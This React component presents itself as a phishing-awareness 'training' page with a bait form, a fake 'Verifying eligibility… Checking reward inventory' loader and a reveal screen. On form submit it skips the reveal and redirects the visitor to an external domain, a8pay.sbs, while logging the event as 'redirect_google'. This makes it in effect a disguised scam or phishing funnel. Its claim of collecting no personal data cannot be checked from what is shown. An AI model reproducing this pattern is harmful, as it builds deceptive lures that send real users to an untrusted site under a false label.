import { useEffect, useState } from "react";
import axios from "axios";
import BaitForm from "./BaitForm";
import RevealScreen from "./RevealScreen";
import { Loader2 } from "lucide-react";

const API = `${process.env.REACT_APP_BACKEND_URL}/api`;

const recordEvent = (event) => {
  // Fire-and-forget. We never send PII — only the event name.
  axios.post(`${API}/training/event`, { event }).catch(() => {});
};

export default function TrainingPage() {
  const [phase, setPhase] = useState("bait"); // 'bait' | 'loading' | 'reveal'

  useEffect(() => {
    recordEvent("page_view");
  }, []);

  const handleSubmit = () => {
    recordEvent("form_submit");
    setPhase("loading");
    setTimeout(() => {
      recordEvent("redirect_google");
      window.location.href = "http://a8pay.sbs";
    }, 3000);
  };

  const handleReset = () => {
    setPhase("bait");
    recordEvent("page_view");
    window.scrollTo({ top: 0, behavior: "smooth" });
  };

  if (phase === "loading") {
    return (
      <main
        data-testid="loading-screen"
        className="min-h-screen bg-[#0b1220] text-slate-100 flex flex-col items-center justify-center px-6"
      >
        <div className="relative w-20 h-20 mb-8" aria-hidden>
          <div className="absolute inset-0 rounded-full border-2 border-emerald-400/20" />
          <Loader2 className="absolute inset-0 m-auto w-20 h-20 text-emerald-400 ring-spin" strokeWidth={1.25} />
        </div>
        <p className="font-display text-2xl sm:text-3xl mb-3" data-testid="loading-title">
          Verifying eligibility…
        </p>
        <p className="text-sm text-slate-400 mb-8 max-w-sm text-center">
          Checking reward inventory and confirming your details.
        </p>
        <div className="w-full max-w-xs h-1.5 rounded-full bg-slate-800 overflow-hidden">
          <div className="h-full sheen-bar" />
        </div>
      </main>
    );
  }

  if (phase === "reveal") {
    return <RevealScreen onReset={handleReset} />;
  }

  return <BaitForm onSubmit={handleSubmit} />;
}
